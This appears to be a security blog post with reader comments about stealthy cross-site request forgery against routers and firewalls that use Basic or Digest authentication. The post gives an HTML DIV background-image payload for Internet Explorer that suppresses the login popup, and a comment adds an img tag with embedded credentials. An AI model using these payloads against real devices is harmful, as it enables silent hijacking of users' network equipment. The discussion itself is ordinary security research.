Cenzic 232 Patent
Paid Advertising
web application security lab

CSRF And Ignoring Basic/Digest Auth

One of the single most annoying things about CSRF and router hacking etc… is that you get the annoying popups on Basic and Digest authentication pages, asking you to log in. More and more devices are moving away from these popup style alerts and moving more towards form based authentication, which is better from a hacking perspective. But still, I would say the vast majority of firewall/switch/router devices out there use Basic or Digest based authentication. The problem with that from an attacker’s perspective is that it creates a noisy popup if it fails (if the user isn’t authenticated) that the user is bound to notice and question. Well, now we have an answer - at least in Internet Explorer:

<DIV STYLE="background-image: url(http://router/path.to.hack)">blah</DIV>

I know there are others tags that work, but probably not as well as this method from what I’ve seen so far. I haven’t found a reliable way in other browsers to allow this to happen, but I’ve only barely scratched the surface of the vast number of CSRFable tags out there. But anyway, yes, this doesn’t cause the Basic or Digest auth dialog to fire so it will be more stealthy upon performing a CSRF that fails. Of course for POST based CSRF you’re still out of luck…

9 Responses to “CSRF And Ignoring Basic/Digest Auth”

  1. rwnin Says:

    <img src=”https://username:password@u.r.gate.way/known/path/img.gif”>

    the tag above will auth a session w/o a popup on basic-auth in ff last time i checked…

    http://rwnin.blogspot.com/2009/06/from-blackhat-reject-bin.html

  2. RSnake Says:

    Yes, but what about when it fails? That is the real question.

  3. rwnin Says:

    if you have the wrong creds, the img shows as broken (red-x) and there’s no secondary prompt for creds (iirc, it’s been a while ;)

  4. RSnake Says:

    uhh… not in IE or Firefox… what browser are you using?

    Firefox alerts on failure, and IE doesn’t work at all because it doesn’t use that syntax anymore. Maybe another browser does…?

  5. Giorgio Maone Says:

    Talking about CSRF and router hacking, did you notice include finally ABE with a built-in LocalRodeo-like rule?

  6. Giorgio Maone Says:

    Broken post above. Should have been

    Talking about CSRF and router hacking, did you notice latest NoScript versions include finally ABE with a built-in LocalRodeo-like rule?

  7. RSnake Says:

    @Giorgio - I finally got a chance to look at it, and it looks really powerful. Not yet to the point of being brain dead, and I’m not sure it yet takes the place of things like Request Policy, but I can see where you’re going with it. I’ll email you a wishlist momentarily.

  8. runxc1 Says:

    A Post CSRF attack can also be accomplished very easily. If you would like to see an example of how to commit one I recently wrote an article demonstrating how to commit a CSRF post attack so that developers know how to defend against it. It can be found at blog.runxc.com/post/2009/07/06/CSRF-by-Example-How-to-do-it-How-to-defend-it.aspx

  9. RSnake Says:

    @runxc1 - a bit off topic, as this is about how to accomplish one under very specific circumstances, and no, POST wouldn’t work in that example. But it’s good that you’re thinking about the problem.